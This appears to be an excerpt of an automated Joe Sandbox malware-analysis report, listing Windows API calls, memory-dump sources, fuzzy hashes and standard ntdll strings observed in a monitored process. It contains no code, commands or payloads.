                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_2c00000_replace.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CreateThread
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2422867632-0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02C09445
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4091574286.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_2c00000_replace.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CreateThread
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2422867632-0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(02C113F9,?,02C24917,02C113F9,02C24447,02C24917,?,02C113F9,02C24447,00001000,?,?,02C2997D), ref: 02C280FF
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4091574286.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_2c00000_replace.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,CA62C1D6,00000007,00000000,00000004,00000000,02C13ABA,000000F4,?,?,?,?,?), ref: 02C2814C
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4091574286.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_2c00000_replace.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3298025750-0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?), ref: 02C17B3C
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4091574286.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_2c00000_replace.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SetErrorMode.KERNELBASE(00008003,?,?,02C116F0,02C26B67,02C24447,?), ref: 02C17953
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4091574286.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_2c00000_replace.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ErrorMode
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2340568224-0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4093678042.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.0000000003509000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000350D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000357E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_33e0000_replace.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4091574286.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_2c00000_replace.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: a0bd81cd7d61091ef07c710a33b5b7639ce3beb2f11083362372e60a029832cf
                                                                                                                                                                                                          • Instruction ID: 853889155773cece88249b9540d984a00104fee34888a00ee29c4dc2e9414c29
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a0bd81cd7d61091ef07c710a33b5b7639ce3beb2f11083362372e60a029832cf
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 43C02B07F7851A0012143CED3C030B0F368D0C30F9E4871B79E08F7010640ACC000ACD
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4093678042.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.0000000003509000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000350D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000357E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_33e0000_replace.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ___swprintf_l
                                                                                                                                                                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                                                          • API String ID: 48624451-2108815105
                                                                                                                                                                                                          • Opcode ID: 8a2c6009f1777676f6c53fa3676e4e553ead58a3fb70103968640c4bb18f2f7b
                                                                                                                                                                                                          • Instruction ID: 3019df1ea041ddfa8a02d8c501d974374188359a628e8d011988de528f307ef4
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8a2c6009f1777676f6c53fa3676e4e553ead58a3fb70103968640c4bb18f2f7b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3A51D6A6F041166FCB10DF98898097FF7B8BB09200714866BF865DF742D3B4DE418BA4
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4093678042.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.0000000003509000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000350D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000357E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_33e0000_replace.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ___swprintf_l
                                                                                                                                                                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                                                          • API String ID: 48624451-2108815105
                                                                                                                                                                                                          • Opcode ID: 5102e00d108c51c95573ba6f7a9b248561d73f2140376fc3fb5de3a34a3116ba
                                                                                                                                                                                                          • Instruction ID: 46d990060dc22da5a99ed470a0b9e2df591d6452796411039c7e7de5bb753360
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5102e00d108c51c95573ba6f7a9b248561d73f2140376fc3fb5de3a34a3116ba
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E151D579A10685AFCFA0DE58C99097FF7F99B44204B0488AFE495DB682D7F4DA008768
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03484725
                                                                                                                                                                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 034846FC
                                                                                                                                                                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03484655
                                                                                                                                                                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 03484787
                                                                                                                                                                                                          • ExecuteOptions, xrefs: 034846A0
                                                                                                                                                                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03484742
                                                                                                                                                                                                          • Execute=1, xrefs: 03484713
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4093678042.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.0000000003509000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000350D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000357E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_33e0000_replace.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                                          • API String ID: 0-484625025
                                                                                                                                                                                                          • Opcode ID: 1f3d1aa2a83befafe8f9b1941b3fcc7177d2b25d59b6d2db8e578e4c12fa0530
                                                                                                                                                                                                          • Instruction ID: 0440aebf568cc2f54faeb68a0bb35d691bacf63c11be26c09254c88424234c32
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f3d1aa2a83befafe8f9b1941b3fcc7177d2b25d59b6d2db8e578e4c12fa0530
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F3514D35A003096EEF10EBA5ED85FAE7BADEF04310F4400BBE515AF291D7719A468F58
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4093678042.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.0000000003509000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000350D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000357E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_33e0000_replace.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                                                                                                                          • Instruction ID: ec58b41c6005c1b87a179d2b917119a40358e864d62b5e2c575b4177847acbc9
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: DD023375508341AFC308CF19C890A6FBBE5EFD8710F458A2EF9998B264DB35E905CB46
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4093678042.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.0000000003509000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000350D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000357E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_33e0000_replace.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: __aulldvrm
                                                                                                                                                                                                          • String ID: +$-$0$0
                                                                                                                                                                                                          • API String ID: 1302938615-699404926
                                                                                                                                                                                                          • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                                                                                          • Instruction ID: 26f63799ba6d26dae8d218fe9062fd06f6d1f6d4192a13d25ad81e095b955b96
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA818D74E062499EDF28CE68C8917BEBBA6EF45310F1C415BFC61AF392C63498418B59
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4093678042.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.0000000003509000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000350D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000357E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_33e0000_replace.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ___swprintf_l
                                                                                                                                                                                                          • String ID: %%%u$[$]:%u
                                                                                                                                                                                                          • API String ID: 48624451-2819853543
                                                                                                                                                                                                          • Opcode ID: d2bb7d9eba809f2a570fb9625ba5c300a2e1289c52fff79ea633092e9ff2eb66
                                                                                                                                                                                                          • Instruction ID: 8559993156ca4a1cab43de09e3b121ed6c44630af025f826aab9bab6f3880d30
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d2bb7d9eba809f2a570fb9625ba5c300a2e1289c52fff79ea633092e9ff2eb66
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3421867AE10259AFCB11DF79D8409EFB7E8EF44644F08052BE905DB201EBB0D9018B95
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • RTL: Re-Waiting, xrefs: 0348031E
                                                                                                                                                                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 034802E7
                                                                                                                                                                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 034802BD
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4093678042.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.0000000003509000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000350D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000357E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_33e0000_replace.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                                                                          • API String ID: 0-2474120054
                                                                                                                                                                                                          • Opcode ID: e98184089f3500b5ebbfa7123f4e213f08c33ae796c17b1b3b5fd0a9094d29d7
                                                                                                                                                                                                          • Instruction ID: 2755a11ba71383185ddf1afdafd763b2001095356561658621ced887437da97d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e98184089f3500b5ebbfa7123f4e213f08c33ae796c17b1b3b5fd0a9094d29d7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 82E1AF30A14741AFD725DF28C884B2AB7E0BB49324F180A5EF5A58F3E1D775D849CB4A
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • RTL: Re-Waiting, xrefs: 03487BAC
                                                                                                                                                                                                          • RTL: Resource at %p, xrefs: 03487B8E
                                                                                                                                                                                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03487B7F
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4093678042.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.0000000003509000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000350D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000357E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_33e0000_replace.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                                          • API String ID: 0-871070163
                                                                                                                                                                                                          • Opcode ID: 10def150f1918d4b7f048c5aa15a5491af778f3fb632be0008c09ef46ffb6424
                                                                                                                                                                                                          • Instruction ID: 1075834b84242267269533910b2185f7b99855c926a1060219b6de719cde3733
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 10def150f1918d4b7f048c5aa15a5491af778f3fb632be0008c09ef46ffb6424
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2B41B4357007025FE724DE29C850B6BB7E5EB84711F140A2EE999DF780D731E8058B99
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0348728C
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • RTL: Re-Waiting, xrefs: 034872C1
                                                                                                                                                                                                          • RTL: Resource at %p, xrefs: 034872A3
                                                                                                                                                                                                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03487294
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4093678042.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.0000000003509000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000350D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000357E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_33e0000_replace.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                                          • API String ID: 885266447-605551621
                                                                                                                                                                                                          • Opcode ID: 4672cb2e99244ca9eb098ae8b6d3fe900646eea4e5bbf3334521dc730da70bef
                                                                                                                                                                                                          • Instruction ID: f1a4aa4b665507de3a69f39c8988bbe31ea06a84f12a178c10421699bfa8dce5
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4672cb2e99244ca9eb098ae8b6d3fe900646eea4e5bbf3334521dc730da70bef
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB41E135600206AFEB20EF25CC41B6ABBA5FB44714F24062AF995EF740DB31E85687D9
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4093678042.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.0000000003509000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000350D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000357E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_33e0000_replace.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ___swprintf_l
                                                                                                                                                                                                          • String ID: %%%u$]:%u
                                                                                                                                                                                                          • API String ID: 48624451-3050659472
                                                                                                                                                                                                          • Opcode ID: 6c2407c3932a4aa0b0f96764d84e9bd2400441db2e5ac403c0342b9c337c2055
                                                                                                                                                                                                          • Instruction ID: b2e6629d9a7964a8780bfd27a6f66e2c2c70437ac8aba97922777a72a36db50c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6c2407c3932a4aa0b0f96764d84e9bd2400441db2e5ac403c0342b9c337c2055
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0931877AA102599FCF60DE39CC40BEFB7F8EB44610F54059BE849EB240EB709A45CB64
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4093678042.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.0000000003509000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000350D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000357E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_33e0000_replace.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: __aulldvrm
                                                                                                                                                                                                          • String ID: +$-
                                                                                                                                                                                                          • API String ID: 1302938615-2137968064
                                                                                                                                                                                                          • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                                                                                          • Instruction ID: 7eb3dfe232cdeb2e52da3fa0b7ef6cc97d02eedaca4df1a497c6d032144d0bce
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4F919172E402159FDB24DE69C8806BFBBA5AF44720F58452BFC65EF3C2DB3099418758
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4093678042.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.0000000003509000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000350D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000357E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_33e0000_replace.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: $$@
                                                                                                                                                                                                          • API String ID: 0-1194432280
                                                                                                                                                                                                          • Opcode ID: d95b33f955c0b1340d78325984168d9ea01ed248d71e515d28c23a08ba47d380
                                                                                                                                                                                                          • Instruction ID: 601303d690e87695438ba3b3d3b84bed49e0b513a15a6513476aeae7f36e70e3
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d95b33f955c0b1340d78325984168d9ea01ed248d71e515d28c23a08ba47d380
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2F815875D002699BDB31CF54CC44BEAB7B8AB08750F0445EBE919BB290D7709E85CFA4